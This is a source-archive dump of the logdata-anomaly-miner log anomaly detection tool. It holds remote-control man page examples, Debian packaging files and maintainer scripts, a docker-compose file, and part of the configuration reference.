PersistenceUtil.persist_all(). example: aminerremotecontrol --exec "persist_all()" Creates a backup of the current persistence directory and saves it in {persistence_dir}/backup/{timestamp}. Use this preferably after persist_all(). example: aminerremotecontrol --exec "create_backup()" Returns a list of all existing persistence backups. example: aminerremotecontrol --exec "list_backups()" Allowlists a path from event_data with the allowlist_event-method from the corresponding class of the component with the component_name. Only the following classes support allowlisting: EnhancedNewMatchPathValueComboDetector, MissingMatchPathValueDetector, NewMatchPathDetector and NewMatchPathValueComboDetector. For most of the components no allowlisting_data is needed and the event_data is a path. The NewMatchPathDetector supports a list of multiple pathes. The MissingMatchPathValueComboDetector needs an integer as allowlisting_data. A positive value sets the interval in seconds to the value. -1 sets the interval to the default value of 3600. A negative value removes the missingMatchPath. Please read the examples of this method to use the correct parameters. example: aminerremotecontrol --exec "allowlist_event_in_component(analysis_context,'EnhancedNewMatchPathValueComboDetector','new/path')" example: aminerremotecontrol --exec "allowlist_event_in_component(analysis_context,'MissingMatchPathValueDetector','new/path',-11)" example: aminerremotecontrol --exec "allowlist_event_in_component(analysis_context,'NewMatchPathDetector',['new/path'])" example: aminerremotecontrol --exec "allowlist_event_in_component(analysis_context,'NewMatchPathValueComboDetector','new/path')" This method returns the string representation of a history event with the dump_event_id. If no event with the dump_event_id could be found, the message "FAILURE: the event with dump_event_id could not be found!" is returned. history_component_name is the registered component of the class VolatileLogarithmicBackoffEventHistory. example: aminerremotecontrol --exec "dump_events_from_history(analysis_context,'VolatileLogarithmicBackoffEventHistory',12)" This method deletes the events with the event_ids from the history. history_component_name is the registered component of the class VolatileLogarithmicBackoffEventHistory. The number of deleted events is returned. example: aminerremotecontrol --exec "ignore_events_from_history(analysis_context,'VolatileLogarithmicBackoffEventHistory',[12,13,15])" This method lists max_event_count events from the history. history_component_name is the registered component of the class VolatileLogarithmicBackoffEventHistory. If max_event_count is None, all events from the history are returned. example: aminerremotecontrol --exec "list_events_from_history(analysis_context,'VolatileLogarithmicBackoffEventHistory',600)" This method allowlists the events with the ids in theid_spec_list from the history. history_component_name is the registered component of the class VolatileLogarithmicBackoffEventHistory. The allowlisting response is returned. example: aminerremotecontrol --exec "allowlist_events_from_history(analysis_context,'VolatileLogarithmicBackoffEventHistory',[12,13,15])" Reopen all StreamPrinterEventHandler streams for log rotation. example: aminerremotecontrol --exec "reopen_event_handler_streams(analysis_context)" Valid Property Names MailAlerting.TargetAddress Value: 'E-Mail Address' Example: aminerremotecontrol --exec "change_config_property(analysis_context,'MailAlerting.TargetAddress', 'root@localhost')" Define a target e-mail address to send alerts to. When undefined, no e-mail notification hooks are added. MailAlerting.FromAddress Value: 'E-Mail Address' Example: aminerremotecontrol --exec "change_config_property(analysis_context,'MailAlerting.FromAddress', 'root@localhost')" Sender address of e-mail alerts. MailAlerting.SubjectPrefix Value: 'String' Example: aminerremotecontrol --exec "change_config_property(analysis_context,'MailAlerting.SubjectPrefix', 'aminer Alerts:')" Define, which text should be prepended to the standard aminer subject. Defaults to "aminer Alerts:" MailAlerting.EventCollectTime Value: Seconds (Integer) Example: aminerremotecontrol --exec "change_config_property(analysis_context,'MailAlerting.EventCollectTime', 10)" Define how many seconds to wait after a first event triggered the alerting procedure before really sending out the e-mail. In that timespan, events are collected and will be sent all using a single e-mail. Defaults to 10 seconds. MailAlerting.MinAlertGap Value: Seconds (Integer) Example: aminerremotecontrol --exec "change_config_property(analysis_context,'MailAlerting.MinAlertGap', 600)" Define the minimum time between two alert e-mails in seconds to avoid spamming. All events during this timespan are collected and sent out with the next report. Defaults to 600 seconds. MailAlerting.MaxAlertGap Value: Seconds (Integer) Example: aminerremotecontrol --exec "change_config_property(analysis_context,'MailAlerting.MaxAlertGap', 1000)" Define the maximum time between two alert e-mails in seconds. When undefined this defaults to "MailAlerting.MinAlertGap". Otherwise this will activate an exponential backoff to reduce messages during permanent error states by increasing the alert gap by 50% when more alert-worthy events were recorded while the previous gap time was not yet elapsed. MailAlerting.MaxEventsPerMessage Value: Number of messages (Integer) Example: aminerremotecontrol --exec "change_config_property(analysis_context,'MailAlerting.MaxEventsPerMessage',1000)" Define how many events should be included in one alert mail at most. This defaults to 1000. LogPrefix Value: 'String' Example: aminerremotecontrol --exec "change_config_property(analysis_context,'LogPrefix','Original log line: ')" Most analysis components implement the output_logline-property, which is True by default. Define a prefix to the original captured log lines. This defaults to ''. Resources.MaxMemoryUsage Value: 'Allowed RAM usage in Megabytes (Integer: 32-maxSystemRAM)' Example: aminerremotecontrol --exec "change_config_property(analysis_context,'Resources.MaxMemoryUsage', -1)" This property limits the maximal possible RAM in MB which the aminer process can use. Be careful at choosing the value, as a shortage of memory causes a MemoryError. This defaults to -1, which means that there is no limit. Core.PersistencePeriod Value: Seconds (Integer) Example: aminerremotecontrol --exec "change_config_property(analysis_context,'Core.PersistencePeriod', 300)" Use this property to change the time between persisting data in analysis components. Defaults to 600 seconds. Log.StatisticsLevel Value: Level [0, 1, 2] Example: aminerremotecontrol --exec "change_config_property(analysis_context,'Log.StatisticsLevel',2)" Change the amount of data saved in statistics. Possible stat-levels are 0 for no statistics, 1 for normal statistic level and 2 for verbose statistics. Defaults to 1. Log.DebugLevel Value: Level [0, 1, 2] Example: aminerremotecontrol --exec "change_config_property(analysis_context,'Log.DebugLevel',2)" Change the debug logging level. Possible debug-levels are 0 for no logging, 1 for normal output (INFO and above), 2 for printing all debug information. Defaults to 1. Log.StatisticsPeriod Value: Seconds (Integer) Example: aminerremotecontrol --exec "change_config_property(analysis_context,'Log.StatisticsPeriod', 360)" Change how often statistics are logged and reset. This defaults to 3600 seconds. FILES /var/run/aminer-remote.socket This is the default remote control socket used when not changed using the --control-socket option. BUGS Report bugs via your distribution's bug tracking system. For bugs in the the software trunk, report via at . SEE ALSO aminer 1 logdata-anomaly-miner-2.6.1/debian/changelog000066400000000000000000000122771437606560100210160ustar00rootroot00000000000000logdata-anomaly-miner (2.6.1-1) unstable; urgency=low [ Markus Wurzenberger ] * New upstream release V2.6.1, see https://github.com/ait-aecid/logdata-anomaly-miner/releases/tag/V2.6.1 logdata-anomaly-miner (2.6.0-1) unstable; urgency=low [ Markus Wurzenberger ] * New upstream release V2.6.0, see https://github.com/ait-aecid/logdata-anomaly-miner/releases/tag/V2.6.0 logdata-anomaly-miner (2.5.1-1) unstable; urgency=low [ Markus Wurzenberger ] * New upstream release V2.5.1, see https://github.com/ait-aecid/logdata-anomaly-miner/releases/tag/V2.5.1 logdata-anomaly-miner (2.5.0-1) unstable; urgency=low [ Markus Wurzenberger ] * New upstream release V2.5.0, see https://github.com/ait-aecid/logdata-anomaly-miner/releases/tag/V2.5.0 [ Sebastian Ramacher ] * debian/rules: Remove obsolete override * debian/control: Bump Standards-Version -- Markus Wurzenberger Mon, 06 Dec 2021 11:02:01 +0100 logdata-anomaly-miner (2.4.2-1) unstable; urgency=low * New upstream release V2.4.2, see https://github.com/ait-aecid/logdata-anomaly-miner/releases/tag/V2.4.2 -- Markus Wurzenberger Tue, 23 Nov 2021 12:00:00 +0000 logdata-anomaly-miner (2.4.1-1) unstable; urgency=low * New upstream release V2.4.1, see https://github.com/ait-aecid/logdata-anomaly-miner/releases/tag/V2.4.1 -- Markus Wurzenberger Fri, 23 Jul 2021 12:00:00 +0000 logdata-anomaly-miner (2.4.0-1) unstable; urgency=low * New upstream release V2.4.0, see https://github.com/ait-aecid/logdata-anomaly-miner/releases/tag/V2.4.0 -- Markus Wurzenberger Fri, 04 Jun 2021 12:00:00 +0000 logdata-anomaly-miner (2.3.1-1) unstable; urgency=low * New upstream release V2.3.1, see https://github.com/ait-aecid/logdata-anomaly-miner/releases/tag/V2.3.1 -- Markus Wurzenberger Thu, 08 Apr 2021 12:00:00 +0000 logdata-anomaly-miner (2.3.0-1) unstable; urgency=low * New upstream release V2.3.0, see https://github.com/ait-aecid/logdata-anomaly-miner/releases/tag/V2.3.0 -- Markus Wurzenberger Mon, 29 Mar 2021 12:00:00 +0000 logdata-anomaly-miner (2.2.1-1) unstable; urgency=low [ Markus Wurzenberger ] * New upstream release V2.2.1, see https://github.com/ait-aecid/logdata-anomaly-miner/releases/tag/V2.2.1 [ Sebastian Ramacher ] * debian/patches: Removed, integrated upstream -- Markus Wurzenberger Mon, 25 Jan 2021 12:00:00 +0000 logdata-anomaly-miner (2.2.0-1) unstable; urgency=low [ Markus Wurzenberger ] * New upstream release V2.2.0 [ Sebastian Ramacher ] * debian/control: - Bump Standards-Version - Set RRR: no * debian/logdata-anomaly-miner.maintscript: Move conffiles to new location * debian/logdata-anomaly-miner.links: Add link for aminer-peristence.py * debian/patches: Add hashbang to aminer-peristence.py * debian/rules: - Simplify rules by using execute_before_dh_auto_build target - Remove executable bits of some Python modules -- Markus Wurzenberger Tue, 22 Dec 2020 12:20:17 +0100 logdata-anomaly-miner (2.0.1-1) unstable; urgency=low * New upstream release V2.0.1 * Bump debhelper compat to 13 * Switch to new upstream location on Github * Update description * Provide upstream metadata -- Markus Wurzenberger Tue, 30 Jun 2020 14:42:46 +0200 logdata-anomaly-miner (1.0.0-1) unstable; urgency=low * New upstream release V1.0.0, see https://launchpad.net/logdata-anomaly-miner/+milestone/v1.0.0 -- Markus Wurzenberger Tue, 2 Oct 2018 17:00:00 +0000 logdata-anomaly-miner (0.0.8-1) unstable; urgency=low * New upstream release V0.0.8, see https://launchpad.net/logdata-anomaly-miner/+milestone/v0.0.8 -- Roman Fiedler Tue, 30 May 2017 17:00:00 +0000 logdata-anomaly-miner (0.0.7-1) unstable; urgency=low * New upstream release V0.0.7, see https://launchpad.net/logdata-anomaly-miner/+milestone/v0.0.7 -- Roman Fiedler Mon, 9 Jan 2017 18:00:00 +0000 logdata-anomaly-miner (0.0.6-1) unstable; urgency=low * New upstream release V0.0.6, see https://launchpad.net/logdata-anomaly-miner/+milestone/v0.0.6 -- Roman Fiedler Fri, 4 Nov 2016 18:00:00 +0000 logdata-anomaly-miner (0.0.5-1) unstable; urgency=low * New upstream release (Closes: #840447). -- Roman Fiedler Tue, 11 Oct 2016 18:00:00 +0000 logdata-anomaly-miner (0.0.3-2) unstable; urgency=low * Packaging fix: unowned directory after purge (Closes: #832347). -- Roman Fiedler Tue, 2 Aug 2016 15:15:00 +0000 logdata-anomaly-miner (0.0.3-1) unstable; urgency=low * New upstream release (Closes: #832058). -- Roman Fiedler Thu, 21 Jul 2016 19:00:00 +0000 logdata-anomaly-miner (0.0.2-1) unstable; urgency=low * Initial inclusion of logdata-anomaly-miner to Debian (Closes: #813096) -- Roman Fiedler Thu, 9 Jun 2016 12:00:00 +0000 logdata-anomaly-miner-2.6.1/debian/control000066400000000000000000000025501437606560100205400ustar00rootroot00000000000000Source: logdata-anomaly-miner Section: admin Priority: optional Maintainer: Markus Wurzenberger Build-Depends: debhelper-compat (= 13), dh-python, docbook-xsl, docbook-xml, python3, xsltproc Standards-Version: 4.6.0 Homepage: https://aecid.ait.ac.at/ Vcs-Git: https://github.com/ait-aecid/logdata-anomaly-miner.git Vcs-Browser: https://github.com/ait-aecid/logdata-anomaly-miner Rules-Requires-Root: no Package: logdata-anomaly-miner Architecture: all Depends: ${python3:Depends}, python3-tz, ${misc:Depends}, python3-cerberus, python3-pkg-resources, python3-setuptools Suggests: python3-scipy Description: tool for log analysis pipelines This tool allows one to analyze log data streams and detect violations or anomalies in it. It can be run from console, as daemon with e-mail alerting, or embedded as library into own programs. It was designed to run the analysis with limited resources and lowest possible permissions to make it suitable for production server use. Analysis methods include: . * log line parsing and filtering with extended syntax and options * detection of new data elements (IPs, user names, MAC addresses) * statistical anomalies in log line values and frequencies * correlation rules between log lines . The tool is suitable to operate as a sensor feeding a SIEM and distributing messages via message queues. logdata-anomaly-miner-2.6.1/debian/copyright000066400000000000000000000036041437606560100210710ustar00rootroot00000000000000Format: https://www.debian.org/doc/packaging-manuals/copyright-format/1.0/ Upstream-Name: logdata-anomaly-miner Source: https://github.com/ait-aecid/logdata-anomaly-miner.git Files: * Copyright: 2016-2018, Roman Fiedler 2018-2021, Markus Wurzenberger 2018-2021, Max Landauer 2019-2021, Wolfgang Hotwagner 2019-2021, Ernst Leierzopf 2020-2021, Georg Hoeld 2016-2021, AIT Austrian Institute of Technology GmbH License: GPL-3.0+ Files: debian/* Copyright: 2016-2018, Roman Fiedler 2018-2021, Markus Wurzenberger 2018-2021, Max Landauer 2019-2021, Wolfgang Hotwagner 2019-2021, Ernst Leierzopf 2020-2021, Georg Hoeld 2016-2021, AIT Austrian Institute of Technology GmbH License: GPL-3.0+ License: GPL-3.0+ This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. . This package is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. . You should have received a copy of the GNU General Public License along with this program. If not, see . . On Debian systems, the complete text of the GNU General Public License version 3 can be found in "/usr/share/common-licenses/GPL-3". logdata-anomaly-miner-2.6.1/debian/dirs000066400000000000000000000000171437606560100200150ustar00rootroot00000000000000var/lib/aminer logdata-anomaly-miner-2.6.1/debian/logdata-anomaly-miner.docs000066400000000000000000000000241437606560100241620ustar00rootroot00000000000000README.md changelog logdata-anomaly-miner-2.6.1/debian/logdata-anomaly-miner.install000066400000000000000000000000201437606560100246740ustar00rootroot00000000000000source/root/* / logdata-anomaly-miner-2.6.1/debian/logdata-anomaly-miner.links000066400000000000000000000003351437606560100243570ustar00rootroot00000000000000/usr/lib/logdata-anomaly-miner/aminer.py /usr/bin/aminer /usr/lib/logdata-anomaly-miner/aminerremotecontrol.py /usr/bin/aminerremotecontrol /usr/lib/logdata-anomaly-miner/aminer-persistence.py /usr/bin/aminer-persistence logdata-anomaly-miner-2.6.1/debian/logdata-anomaly-miner.maintscript000066400000000000000000000003511437606560100255720ustar00rootroot00000000000000rm_conffile /etc/aminer/config.py.template 2.0.1-1~ rm_conffile /etc/init/aminer.conf 2.0.1-1~ mv_conffile /etc/aminer/conf-available/generic/EximParsingModel.py /etc/aminer/conf-available/generic/EximGenericParsingModel.py 2.2.0-1~ logdata-anomaly-miner-2.6.1/debian/logdata-anomaly-miner.manpages000066400000000000000000000000551437606560100250310ustar00rootroot00000000000000debian/aminer.1 debian/aminerremotecontrol.1 logdata-anomaly-miner-2.6.1/debian/postinst000077500000000000000000000023621437606560100207470ustar00rootroot00000000000000#!/bin/sh # postinst script for logdata-anomaly-miner # # see: dh_installdeb(1) set -e # summary of how this script can be called: # * `configure' # * `abort-upgrade' # * `abort-remove' `in-favour' # # * `abort-remove' # * `abort-deconfigure' `in-favour' # `removing' # # for details, see https://www.debian.org/doc/debian-policy/ or # the debian-policy package case "$1" in configure) analysisUser="aminer" analysisGroup="aminer" # Prohibit read access to configuration for other processes if ! dpkg-statoverride --list /etc/aminer > /dev/null; then chown "root.${analysisGroup}" -- /etc/aminer chmod 00750 -- /etc/aminer fi if ! dpkg-statoverride --list /var/lib/aminer > /dev/null; then chmod 00700 -- /var/lib/aminer chown "${analysisUser}.${analysisGroup}" -- /var/lib/aminer fi ;; esac # dh_installdeb will replace this with shell code automatically # generated by other debhelper scripts. #DEBHELPER# exit 0 logdata-anomaly-miner-2.6.1/debian/postrm000077500000000000000000000015171437606560100204110ustar00rootroot00000000000000#!/bin/sh # postrm script for logdata-anomaly-miner # # see: dh_installdeb(1) set -e # summary of how this script can be called: # * `remove' # * `purge' # * `upgrade' # * `failed-upgrade' # * `abort-install' # * `abort-install' # * `abort-upgrade' # * `disappear' # # for details, see https://www.debian.org/doc/debian-policy/ or # the debian-policy package case "$1" in remove) # Delete user, will also delete group. userdel "aminer" ;; esac # dh_installdeb will replace this with shell code automatically # generated by other debhelper scripts. #DEBHELPER# exit 0 logdata-anomaly-miner-2.6.1/debian/preinst000077500000000000000000000033201437606560100205430ustar00rootroot00000000000000#!/bin/sh # preinst script for logdata-anomaly-miner # # see: dh_installdeb(1) set -e # summary of how this script can be called: # * `install' # * `install' # * `upgrade' # * `abort-upgrade' # for details, see https://www.debian.org/doc/debian-policy/ or # the debian-policy package case "$1" in install) # Create the user to run the analysis service. analysisGroup="aminer" if [ "$(getent group "${analysisGroup}")" = "" ]; then # Add a separate group for aitmon. # The group does not need to be a system group, but low gid is # preferable to avoid mixing with user groups. Using '--system' # flag would cause gid allocation to go down from UID_MIN, not # up from SYS_GID_MIN, so avoid using --system. groupadd -K GID_MIN=100 -K GID_MAX=1000 "${analysisGroup}" fi analysisUser="aminer" if [ "$(getent passwd "${analysisUser}")" = "" ]; then # Add a system user, set home directory to nonexisting directory # to avoid loading of user-defined files. Create user without # using '--system' flag, thus allocating UIDs upwards. useradd -M --shell /usr/sbin/nologin --gid "${analysisGroup}" -K PASS_MAX_DAYS=-1 -K UID_MIN=100 -K UID_MAX=999 --home /nonexistent "${analysisUser}" # There is no way to make useradd ommit assignment of subuids, # so remove them immediately on affected systems. if test -e /etc/subuid; then usermod --del-subuids 1-4294967295 --del-subgids 1-4294967295 "${analysisUser}" fi fi ;; esac # dh_installdeb will replace this with shell code automatically # generated by other debhelper scripts. #DEBHELPER# exit 0 logdata-anomaly-miner-2.6.1/debian/rules000077500000000000000000000014551437606560100202200ustar00rootroot00000000000000#!/usr/bin/make -f # -*- makefile -*- # Uncomment this to turn on verbose mode. # export DH_VERBOSE=1 %: dh $@ --with=python3 execute_before_dh_auto_build: xsltproc --nonet \ --param make.year.ranges 1 \ --param make.single.year.ranges 1 \ --param man.charmap.use.subset 0 \ -o debian/ \ http://docbook.sourceforge.net/release/xsl/current/manpages/docbook.xsl \ debian/aminer.1.xml debian/aminerremotecontrol.1.xml # Modify startup behaviour in auto-generated code in postinst: # Do not attempt to add aminer.service to autostart if user does # not want to have it running explicitely. See "Running as a Service" # from /usr/share/doc/aminer/Readme.txt.gz for more information. override_dh_installsystemd: dh_installsystemd --no-enable override_dh_installchangelogs: dh_installchangelogs changelog logdata-anomaly-miner-2.6.1/debian/source/000077500000000000000000000000001437606560100204335ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/debian/source/format000066400000000000000000000000141437606560100216410ustar00rootroot000000000000003.0 (quilt) logdata-anomaly-miner-2.6.1/debian/upstream/000077500000000000000000000000001437606560100207735ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/debian/upstream/metadata000066400000000000000000000021501437606560100224740ustar00rootroot00000000000000Bug-Database: https://github.com/ait-aecid/logdata-anomaly-miner/issues Bug-Submit: https://github.com/ait-aecid/logdata-anomaly-miner/issues/new Changelog: https://github.com/ait-aecid/logdata-anomaly-miner/blob/main/changelog Documentation: https://github.com/ait-aecid/logdata-anomaly-miner/blob/main/README.md Other-References: https://aecid.ait.ac.at/further-information/ Reference: - Author: Markus Wurzenberger and Florian Skopik and Giuseppe Settanni and Roman Fiedler Booktitle: Proceedings of the 4th International Conference on Information Systems Security and Privacy DOI: 10.5220/0006643003860397 ISBN: 978-989-758-282-0 Pages: 386-397 Publisher: SciTePress Title: "AECID: A Self-learning Anomaly Detection Approach based on Light-weight Log Parser Models" Type: inproceedings URL: https://www.scitepress.org/Link.aspx?doi=10.5220/0006643003860397 Year: 2018 Repository: https://github.com/ait-aecid/logdata-anomaly-miner.git Repository-Browse: https://github.com/ait-aecid/logdata-anomaly-miner Security-Contact: https://github.com/ait-aecid/logdata-anomaly-miner/blob/main/SECURITY.md logdata-anomaly-miner-2.6.1/debian/watch000066400000000000000000000003041437606560100201610ustar00rootroot00000000000000version=4 opts="filenamemangle=s%(?:.*?)?V?(\d[\d.]*)\.tar\.gz%logdata-anomaly-miner-$1.tar.gz%" \ https://github.com/ait-aecid/logdata-anomaly-miner/tags \ (?:.*?/)?V?(\d[\d.]*)\.tar\.gz logdata-anomaly-miner-2.6.1/docker-compose.yml000066400000000000000000000015611437606560100213510ustar00rootroot00000000000000version: "3" services: redpanda: image: docker.vectorized.io/vectorized/redpanda:latest command: ['start --overprovisioned --smp 1 --memory 1G --reserve-memory 0M --node-id 0 --check=false'] ports: - "9092:9092" - "9644:9644" akafka: image: aitaecid/akafka:latest environment: KAFKA_TOPICS: '["aminer"]' KAFKA_BOOTSTRAP_SERVERS: redpanda volumes: - '$PWD/akafka:/var/lib/akafka' links: - redpanda depends_on: - redpanda aminer: build: context: . volumes: - '$PWD/akafka:/var/lib/akafka' - '$PWD/aminercfg:/etc/aminer' - '$PWD/persistency:/var/lib/aminer' - '$PWD/logs:/logs' depends_on: - akafka logdata-anomaly-miner-2.6.1/docs/000077500000000000000000000000001437606560100166415ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/docs/CONFIGURATION.rst000066400000000000000000003326001437606560100214060ustar00rootroot00000000000000.. _Overview: ======== Overview ======== The logdata-anomaly-miner can be configured in two different formats: **yaml** and **python**. The preferred format is yaml and the default configuration file for it is */etc/aminer/config.yaml*. The python format can be configured in */etc/aminer/config.py* and offers advanced possibilities to configure the logdata-anomaly-miner. However, this is only recommended for experts, as no errors are caught in the python configuration, which can make debugging very difficult. For both formats there are template configurations in */etc/aminer/template\_config.yaml* and */etc/aminer/template\_config.py*. The basic structure of the logdata-anomaly-miner is illustrated in the folloging diagram: .. image:: images/aminer-config-color.png :alt: Structure of the configuration-file: GENERAL, INPUT, PARSING, ANALYSING, EVENTHANDLING ----------------- Analysis Pipeline ----------------- The core component of the logdata-anomaly-miner is the "analysis pipeline". It consists of the parts INPUT, ANALYSIS and OUTPUT. .. image:: images/analysis-pipeline.png :alt: Parts of the analysis-pipeline ======================= Command-line Parameters ======================= ---------- -h, --help ---------- Show the help message and exit. ------------- -v, --version ------------- Show program's version number and exit. ------------------- -u, --check-updates ------------------- Check if updates for the aminer are available and exit. -------------------------- -c CONFIG, --config CONFIG -------------------------- * Default: /etc/aminer/config.yml Use the settings of the file CONFIG on startup. Two config-variants are allowed: python and yaml. .. seealso:: :ref:`Overview` ------------ -D, --daemon ------------ Run aminer as a daemon process. -------------------------- -s {0,1,2}, --stat {0,1,2} -------------------------- Set the stat level. Possible stat-levels are 0 for no statistics, 1 for normal statistic level and 2 for verbose statistics. --------------------------- -d {0,1,2}, --debug {0,1,2} --------------------------- Set the debug level. Possible debug-levels are 0 for no debugging, 1 for normal output (INFO and above), 2 for printing all debug information. -------------- --run-analysis -------------- Run aminer analysis-child. .. note:: This parameter is for internal use only. ----------- -C, --clear ----------- Remove all persistence directories and run aminer. -------------------------- -r REMOVE, --remove REMOVE -------------------------- Remove a specific persistence directory. REMOVE must be the name of the directory and must not contain '/' or '.'. Usually this directory can be found in '/var/lib/aminer'. ----------------------------- -R RESTORE, --restore RESTORE ----------------------------- Restore a persistence backup. RESTORE must be the name of the directory and must not contain '/' or '.'. Usually this directory can be found in '/var/lib/aminer'. ---------------- -f, --from-begin ---------------- Removes repositioning data before starting the aminer so that all input files will be analyzed starting from the first line in the file rather than the last previously analyzed line. ------------------ -o, --offline-mode ------------------ Stop the aminer after all logs have been processed. .. note:: This parameter is useful for forensic analysis. --------------------------------------------- --config-properties KEY=VALUE [KEY=VALUE ...] --------------------------------------------- Set a number of config_properties by using key-value pairs (do not put spaces before or after the = sign). If a value contains spaces, you should define it with double quotes: 'foo="this is a sentence". Note that values are always treated as strings. If values are already defined in the config_properties, the input types are converted to the ones already existing. ======================= Configuration Reference ======================= --------------------- General Configuration --------------------- LearnMode ~~~~~~~~~ * Type: boolean (True,False) * Default: False This options turns the LearnMode on globally. .. warning:: This option can be overruled by the learn_mode that is configurable per analysis component. .. code-block:: yaml LearnMode: True AminerUser ~~~~~~~~~~ * Default: aminer This option defines the system-user that owns the aminer-process. .. code-block:: yaml AminerUser: 'aminer' AminerGroup ~~~~~~~~~~~ * Default: aminer This option defines the system-group that owns the aminer-process. .. code-block:: yaml AminerGroup: 'aminer' AnalysisConfigFile ~~~~~~~~~~~~~~~~~~ * Default: None This (optional) configuration file contains the whole analysis child configuration (code). When missing those configuration parameters are also taken from the main config. .. warning:: This option is only available for python configs. It does not work for yaml configs. .. code-block:: python config_properties['AnalysisConfigFile'] = 'analysis.py' RemoteControlSocket ~~~~~~~~~~~~~~~~~~~ This option controls where the unix-domain-socket for the RemoteControl should be created. The socket will not be created if this option is not set. .. code-block:: yaml RemoteControlSocket: '/var/lib/aminer/remcontrol.sock' SuppressNewMatchPathDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ * Default: False * Type: boolean (True,False) Disable the output of the NewMatchPathDetector which detects new paths for logtypes. .. code-block:: yaml SuppressNewMatchPathDetector: False LogResourceList ~~~~~~~~~~~~~~~ * Required: **True** * Resource-Types: ``file://``, ``unix://`` Define the list of log resources to read from: the resources named here do not need to exist when aminer is started. This will just result in a warning. However if they exist, they have to be readable by the aminer process! Supported types are: * file://[path]: Read data from file, reopen it after rollover * unix://[path]: Open the path as UNIX local socket for reading .. code-block:: yaml LogResourceList: - 'file:///var/log/apache2/access.log' - 'file:///home/ubuntu/data/mail.cup.com-train/daemon.log' - 'file:///home/ubuntu/data/mail.cup.com-train/auth.log' - 'file:///home/ubuntu/data/mail.cup.com-train/suricata/eve.json' - 'file:///home/ubuntu/data/mail.cup.com-train/suricata/fast.log' Core.PersistenceDir ~~~~~~~~~~~~~~~~~~~ * Default: /var/lib/aminer Read and store information to be used between multiple executions of aminer in this directory. The directory must only be accessible to the 'AminerUser' but not group/world readable. On violation, aminer will refuse to start. .. code-block:: yaml Core.PersistenceDir: '/var/lib/aminer' Core.PersistencePeriod ~~~~~~~~~~~~~~~~~~~~~~ * Type: Number of seconds * Default: 600 This options controls whether the logdata-anomaly-miner should write its persistency to disk. .. code-block:: yaml Core.PersistencePeriod: 600 Core.LogDir ~~~~~~~~~~~ * Default: /var/lib/aminer/log Directory for logfiles. This directory must be writeable to the 'AminerUser'. .. code-block:: yaml Core.LogDir: '/var/lib/aminer/log' MailAlerting.TargetAddress ~~~~~~~~~~~~~~~~~~~~~~~~~~ * Default: disabled Define a target e-mail address to send alerts to. When undefined, no e-mail notification hooks are added. .. code-block:: yaml MailAlerting.TargetAddress: 'root@localhost' MailAlerting.FromAddress ~~~~~~~~~~~~~~~~~~~~~~~~ Sender address of e-mail alerts. When undefined, "sendmail" implementation on host will decide, which sender address should be used. .. code-block:: yaml MailAlerting.FromAddress: 'root@localhost' MailAlerting.SubjectPrefix ~~~~~~~~~~~~~~~~~~~~~~~~~~ * Default: "aminer Alerts" Define, which text should be prepended to the standard aminer subject. .. code-block:: yaml MailAlerting.SubjectPrefix: 'aminer Alerts:' MailAlerting.AlertGraceTime ~~~~~~~~~~~~~~~~~~~~~~~~~~~ * Type: Number of seconds * Default: 0 (any event can immediately trigger alerting) Define a grace time after startup before aminer will react to an event and send the first alert e-mail. .. code-block:: yaml MailAlerting.AlertGraceTime: 0 MailAlerting.EventCollectTime ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ * Type: Number of seconds * Default: 10 Define how many seconds to wait after a first event triggered the alerting procedure before really sending out the e-mail. In that timespan, events are collected and will be sent all using a single e-mail. .. code-block:: yaml MailAlerting.EventCollectTime: 10 MailAlerting.MinAlertGap ~~~~~~~~~~~~~~~~~~~~~~~~ * Type: Number of seconds * Default: 600 Define the minimum time between two alert e-mails in seconds to avoid spamming. All events during this timespan are collected and sent out with the next report. .. code-block:: yaml MailAlerting.MinAlertGap: 600 MailAlerting.MaxAlertGap ~~~~~~~~~~~~~~~~~~~~~~~~ * Type: Number of seconds * Default: 600 Define the maximum time between two alert e-mails in seconds. When undefined this defaults to "MailAlerting.MinAlertGap". Otherwise this will activate an exponential backoff to reduce messages during permanent error states by increasing the alert gap by 50% when more alert-worthy events were recorded while the previous gap time was not yet elapsed. .. code-block:: yaml MailAlerting.MaxAlertGap: 600 MailAlerting.MaxEventsPerMessage ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ * Type: Number of events * Default: 1000 Define how many events should be included in one alert mail at most. .. code-block:: yaml MailAlerting.MaxEventsPerMessage: 1000 LogPrefix ~~~~~~~~~ This option defines the prefix for the output of each anomaly. .. code-block:: yaml LogPrefix: '' Log.Encoding ~~~~~~~~~~~~ * Type: string * Default: 'utf-8' This option defines the encoding of the logfiles. .. code-block:: yaml Log.Encoding: 'utf-8' Log.StatisticsPeriod ~~~~~~~~~~~~~~~~~~~~ * Type: Number of seconds * Default: 3600 Defines how often to write into stat-logfiles. .. code-block:: yaml Log.StatisticsPeriod: 3600 Log.StatisticsLevel ~~~~~~~~~~~~~~~~~~~ * Type: Number of loglevel * Default: 1 Defines the loglevel for the stat logs. .. code-block:: yaml Log.StatisticsLevel: 2 Log.DebugLevel ~~~~~~~~~~~~~~ * Type: Number of loglevel * Default: 1 Defines the loglevel of the aminer debug-logfile. .. code-block:: yaml Log.DebugLevel: 2 Log.RemoteControlLogFile ~~~~~~~~~~~~~~~~~~~~~~~~ * Type: string (path to the logfile) * Default: '/var/lib/aminer/log/aminerRemoteLog.txt' Defines the path of the logfile for the RemoteControl. .. code-block:: yaml Log.RemoteControlLogFile: '/var/log/aminerremotecontrol.log' Log.StatisticsFile ~~~~~~~~~~~~~~~~~~ * Type: string (path to the logfile) * Default: '/var/lib/aminer/log/statistics.log' Defines the path of the stats-file. .. code-block:: yaml Log.StatisticsFile: '/var/log/aminer-stats.log' Log.DebugFile ~~~~~~~~~~~~~~~~~~ * Type: string (path to the logfile) * Default: '/var/lib/aminer/log/aminer.log' Defines the path of the debug-log-file. .. code-block:: yaml Log.DebugFile: '/var/log/aminer.log' Log.Rotation.MaxBytes ~~~~~~~~~~~~~~~~~~~~~ * Type: number of bytes * Default: 1048576 (1 Megabyte) Defines the number of bytes before "Log.RemoteControlLogFile", "Log.StatisticsFile" and "Log.DebugFile" is rotated. .. code-block:: yaml 